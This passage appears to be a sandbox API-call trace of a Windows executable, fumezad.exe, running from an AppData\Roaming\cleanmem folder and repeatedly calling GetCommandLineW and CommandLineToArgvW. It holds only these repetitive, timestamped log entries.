lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6088e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608968*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6089e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608a68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608ae8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608be8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608c68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608ce8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608d68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608de8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608e68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608ee8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608f68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608fe8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609068*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6090e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609168*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6091e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609268*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6092e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609368*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6093e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609468*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6094e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609568*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6095e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609668*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6096e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609768*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6097e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.145] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609868*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6098e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609968*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6099e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609a68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609ae8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609b68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609be8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609c68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609ce8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609d68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609de8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609e68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609ee8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609f68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x609fe8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a068*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.146] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a0e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a168*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a1e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a268*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a2e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a368*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a3e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a468*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a4e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a568*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a5e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a668*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a6e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a768*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a7e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a868*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.147] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a8e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.147] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.148] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a968*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.148] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.148] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60a9e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.148] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.148] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60aa68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.148] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.148] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x60aae8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.162] GetCommandLineW () 